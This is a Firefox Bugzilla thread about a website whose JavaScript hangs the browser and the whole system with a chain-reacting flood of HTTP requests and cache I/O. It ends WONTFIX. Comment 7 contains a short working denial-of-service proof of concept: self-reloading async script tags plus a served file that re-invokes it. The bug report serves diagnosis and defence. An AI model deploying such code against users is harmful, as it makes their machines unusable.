Closed Bug 1514413 Opened 6 years ago Closed 5 years ago

Opening http://datakitchen.tumblr.com completely hangs system, causes high disk I/O

Tracking

()

Status:

RESOLVED WONTFIX

Project Flags:

Performance Impact

medium

People

(Reporter: 13hurdw, Assigned: mayhemer)

References

(Blocks 1 open bug,
URL
)

Details

(Keywords: csectype-dos, perf:resource-use, Whiteboard: [necko-triaged])

Attachments

(2 files, 1 obsolete file)

datakitchen.tumblr.com hanging Firefox 6 years ago 13hu (deleted), image/png		Details
this-file-will-completely-hang-the-browser-not-only-the-content-process.html 5 years ago violet.bugreport (deleted), text/html		Details
this-file-will-completely-hang-the-browser-not-only-the-content-process.html 5 years ago violet.bugreport (deleted), text/html		Details

13hu

Reporter

Description

•

6 years ago

Attached image datakitchen.tumblr.com hanging Firefox (deleted) — Details

Firefox 64 on Ubuntu 18.04.1 LTS

To reproduce:

- http://datakitchen.tumblr.com/

Actual results:
Visiting the site causes Firefox to hang completely and the entire system to slow down, heavy disk I/O for easily ~30 minutes. Eventually forced to REISUB to get back into my machine.
This site is basically causing a denial-of-service condition.

Reproduced on two different Ubuntu machines and a clean profile.


Expected: opens like a normal website. I/O should be throttled.

Kanchan Kumari QA

Comment 1

•

6 years ago

I could reproduce this issue on 

User Agent 	Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0

Component: Untriaged → JavaScript Engine

Product: Firefox → Core

Kannan Vijayan [:djvj]

Comment 2

•

6 years ago

I just reproduced this on my machine as well. Basically DOSed the browser. Content is actually responsive here, but chrome is not - the close-window button, the back button, and chrome buttons on other windows no longer worked after this.

Seems like a serious issue.

Marking P1.

Priority: -- → P1

Jason Orendorff [:jorendorff]

Comment 3

•

5 years ago

Nicolas, could you take a look at this?

Flags: needinfo?(nicolas.b.pierron)

Nicolas B. Pierron [:nbp]

Comment 4

•

5 years ago

Kannan, would it be possible to get a profile, even a perf profile if the Gecko profiler is not responding?
From the description of this bug I am not sure if this belongs to the JavaScript category.

Flags: needinfo?(nicolas.b.pierron) → needinfo?(kvijayan)

Keywords: hang

Whiteboard: [qf]

Will Hawkins

Updated

•

5 years ago

Whiteboard: [qf] → [qf:p1:pageload]

Will Hawkins

Updated

•

5 years ago

Whiteboard: [qf:p1:pageload] → [qf:p2:resource]

Kannan Vijayan [:djvj]

Comment 5

•

5 years ago

I don't think it's likely JS either. There's nothing specifically in Spidermonkey that would spur heavy disk IO. If the site is using local storage or some other filestore-touching API heavily, then the throttling responsibility would be on the part of the subsystem involved.

If the browser is hanging then the gecko profiler will not be usable. This is probably better pursued with a system profiler on the binary to identify the subsystem.

Still not ideal as it seems it's an extreme system slowdown, but it has a better chance of working effectively than the Gecko Profiler route.

Flags: needinfo?(kvijayan)

Nicolas B. Pierron [:nbp]

Updated

•

5 years ago

Status: UNCONFIRMED → NEW

Component: JavaScript Engine → General

Ever confirmed: true

Trevor Rowbotham [:rowbot]

Comment 6

•

5 years ago

Here is a profile I managed to grab from the Gecko Profiler before the browser became unresponsive http://bit.ly/2XnigXd. Using latest Firefox Nightly on Win 10 x64.

violet.bugreport

Updated

•

5 years ago

Assignee: nobody → violet.bugreport

Component: General → Networking

violet.bugreport

Comment 7

•

5 years ago

I've found the problem.

A minimal example to reproduce the bug would be:

<head>
</head>
<body>
<script>
h = document.getElementsByTagName("head")[0];
let i = 0;
function evilimpl() {
    s = document.createElement("script");
    s.type = "text/javascript";
    s.async = true;
    s.src = "http://127.0.0.1/echo_evil.js?" + i;
    i++;
    h.appendChild(s);
}

function evil() {
  for (let i = 0; i < 5; ++i) {
    evilimpl();
  }
}
evil();
</script>
</body>

Then use a server like nginx to serve the echo_evil.js with content

evil()

Logging shows the content process is issuing far more http request than the parent can handle in this case. I may need some time to figure out what is going on here...

Jan de Mooij [:jandem]

Updated

•

5 years ago

Blocks: eviltraps

Kershaw Chang [:kershaw]

Comment 8

•

5 years ago

If you need any help from networking team, please let me know. Thanks.

Whiteboard: [qf:p2:resource] → [qf:p2:resource][necko-triaged]

Comment hidden (obsolete)

violet.bugreport

Updated

•

5 years ago

Attachment #9051900 - Attachment is obsolete: true

violet.bugreport

Comment 10

•

5 years ago

Attached file this-file-will-completely-hang-the-browser-not-only-the-content-process.html (deleted) — Details

violet.bugreport

Comment 11

•

5 years ago

The hanging is caused by a flood of countless HttpChannelParent::DoAsyncOpen() that make the event loop at main thread of the parent process almost useless.

See my attached file. Actually this can be reproduced by any JavsScript code that requires a network request, such as <script>, <img>, XMLHttpRequest, etc.

I couldn't find throttling attempt at netwerk/protocol/http to restrict how many Http request a child can send to the parent. So I think a possible solution is to add some throttling code to netwerk/protocol/http/HttpChannelChild.cpp, e.g. HttpChannelChild::AsyncOpen(). If the content process is issuing too many http request in a short period, then reject them. So that we can protect the parent process from being flooded by those events.

What do you think about this? I'm not sure if it's the best solution since I'm unfamiliar with the networking codebase.

Flags: needinfo?(kershaw)

Kershaw Chang [:kershaw]

Comment 12

•

5 years ago

(In reply to violet.bugreport from comment #11)

The hanging is caused by a flood of countless HttpChannelParent::DoAsyncOpen() that make the event loop at main thread of the parent process almost useless.

See my attached file. Actually this can be reproduced by any JavsScript code that requires a network request, such as <script>, <img>, XMLHttpRequest, etc.

I couldn't find throttling attempt at netwerk/protocol/http to restrict how many Http request a child can send to the parent. So I think a possible solution is to add some throttling code to netwerk/protocol/http/HttpChannelChild.cpp, e.g. HttpChannelChild::AsyncOpen(). If the content process is issuing too many http request in a short period, then reject them. So that we can protect the parent process from being flooded by those events.

What do you think about this? I'm not sure if it's the best solution since I'm unfamiliar with the networking codebase.

I think it would be risky to throttle creating Http requests, since this might break real web sites.

Dragana, I think we've encountered some thing like this before, but I can't find the bug number right now. Do we already have a conclusion on how to deal with this kind of problem?

Flags: needinfo?(kershaw) → needinfo?(dd.mozilla)

violet.bugreport

Comment 13

•

5 years ago

I think it would be risky to throttle creating Http requests, since this might break real web sites.

It makes sense. However, we can still locally enqueue the requests if there are too many pending ones, then send them to the parent in the future.

In a nutshell, there should be a mechanism to avoid flooding the parent, otherwise some bad websites might use it to force a user to read their page when the whole browser is unresponsive. Chrome doesn't have this problem.

Nils Ohlmeier [:drno]

Comment 14

•

5 years ago

(In reply to violet.bugreport from comment #13)

Chrome doesn't have this problem.

When I just loaded the page in Chrome it in fact caused quite some problems for Chrome as well. You can continue to scroll the page smoothly and you can continue to use the menus and open new tabs. But I could not close the tab with the evil page in it any more. Closing Chrome makes the UI disappear, but the Chrome Helper process keeps running at 100% CPU until you kill it. Only then Chrome is able to shut down.

13hu

Reporter

Comment 15

•

5 years ago

(In reply to Nils Ohlmeier [:drno] from comment #14)

(In reply to violet.bugreport from comment #13)

Chrome doesn't have this problem.

When I just loaded the page in Chrome it in fact caused quite some problems for Chrome as well. You can continue to scroll the page smoothly and you can continue to use the menus and open new tabs. But I could not close the tab with the evil page in it any more. Closing Chrome makes the UI disappear, but the Chrome Helper process keeps running at 100% CPU until you kill it. Only then Chrome is able to shut down.

Chromium has said they wont fix anything with this - https://bugs.chromium.org/p/chromium/issues/detail?id=915405#c2

See Also: → https://bugs.chromium.org/p/chromium/issues/detail?id=915405

violet.bugreport

Comment 16

•

5 years ago

Unassigned since it's likely a WONTFIX...

Assignee: violet.bugreport → nobody

Priority: P1 → P3

13hu

Reporter

Comment 17

•

5 years ago

(In reply to violet.bugreport from comment #16)

Unassigned since it's likely a WONTFIX...

This should be still be higher priority for FF
The effect is worse in FF (total system DoS) than in Chrome

Just because chromium said they wontfix does not mean Mozilla should.

violet.bugreport

Comment 18

•

5 years ago

Just because chromium said they wontfix does not mean Mozilla should.

This is not my reason to say it's possibly a WONTFIX. Please read Comment 12 from networking team, the issue was already known, but it doesn't seem to have any fix. That's why marking it P1 doesn't make sense. (P1 means it will be fixed in current release cycle)

Honza Bambas (:mayhemer)

Assignee

Updated

•

5 years ago

Assignee: nobody → honzab.moz

Honza Bambas (:mayhemer)

Assignee

Comment 19

•

5 years ago

Still reproducible with that page. Each new script request is for a different URL. I/O comes from the cache as we use a separate file for each URL. Throttling of requests on the child process is not a proper fix. This is more a general scheduling issue, but not just that. If a user wants to close the offending tab, the whole chain of events coming from the interaction to close the tab should have a high enough priority to skip over the long tail of stuff pending in the main thread queue.

Tested with Release and Nightly (66, 68).

There are two things that concern me:

memory consumption of the parent process and the content process grow, more or less exponentially
the IO is mostly the same all the time

These two factors will make a system running on a lower-end hardware swap and make it unusable relatively quickly.

This one attack (if the page really tries to attack) is a chain reaction schema. Detecting it and preventing when it really becomes evil may be quite tricky. Any heuristic (preferably on the parent process, rather than the child process) we may invent for chain reaction will not apply to a single content loop quickly creating requests.

Only option seems to be a general (quite high, tho) limit for requests per time. If it goes over the threshold we start immediately rejecting them (canceling them). this is always very sensitive thing to do and may break actual sites, so I tend to not implementing any such thing.

WONTFIXing, but I'll keep this in mind.

Status: NEW → RESOLVED

Closed: 5 years ago

Flags: needinfo?(dd.mozilla)

Keywords: hang → csectype-dos

Resolution: --- → WONTFIX

Dave Hunt [:davehunt] [he/him] ⌚BST

Updated

•

2 years ago

Performance Impact: --- → P2

Keywords: perf:resource-use

Whiteboard: [qf:p2:resource][necko-triaged] → [necko-triaged]

You need to log in before you can comment on or make changes to this bug.